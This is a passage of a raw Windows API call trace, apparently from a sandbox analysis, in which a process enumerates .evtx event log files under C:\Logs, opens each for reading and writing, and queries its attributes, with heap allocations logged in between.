MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76200 [0087.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 55 [0087.156] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.156] GetFileType (hFile=0x424) returned 0x1 [0087.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0087.156] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.156] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.156] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.157] CloseHandle (hObject=0x424) returned 1 [0087.157] AreFileApisANSI () returned 1 [0087.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75fa8 [0087.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 55 [0087.157] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.157] GetFileType (hFile=0x424) returned 0x1 [0087.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.157] CloseHandle (hObject=0x424) returned 1 [0087.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.158] AreFileApisANSI () returned 1 [0087.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75b70 [0087.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 55 [0087.158] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0087.158] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.158] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.158] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cAlternateFileName="MI7A67~1.EVT")) returned 1 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0087.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0087.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ced8 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0087.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0087.159] AreFileApisANSI () returned 1 [0087.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", lpUsedDefaultChar=0x0) returned 73 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0087.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0087.160] AreFileApisANSI () returned 1 [0087.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0087.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0087.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 73 [0087.160] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.160] GetFileType (hFile=0x424) returned 0x1 [0087.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0087.160] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.160] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.161] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.161] CloseHandle (hObject=0x424) returned 1 [0087.161] AreFileApisANSI () returned 1 [0087.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0087.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0087.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 73 [0087.161] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.161] GetFileType (hFile=0x424) returned 0x1 [0087.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0087.161] CloseHandle (hObject=0x424) returned 1 [0087.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0087.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0087.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0087.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0087.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0087.162] AreFileApisANSI () returned 1 [0087.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85260 [0087.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 73 [0087.162] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0087.162] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.162] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.162] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SettingSync%4Debug.evtx", cAlternateFileName="MI3773~1.EVT")) returned 1 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0087.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0087.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0087.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0087.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.163] AreFileApisANSI () returned 1 [0087.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx", lpUsedDefaultChar=0x0) returned 50 [0087.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0087.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0087.164] AreFileApisANSI () returned 1 [0087.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0087.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45fd8 [0087.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 50 [0087.164] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.164] GetFileType (hFile=0x424) returned 0x1 [0087.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.164] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: 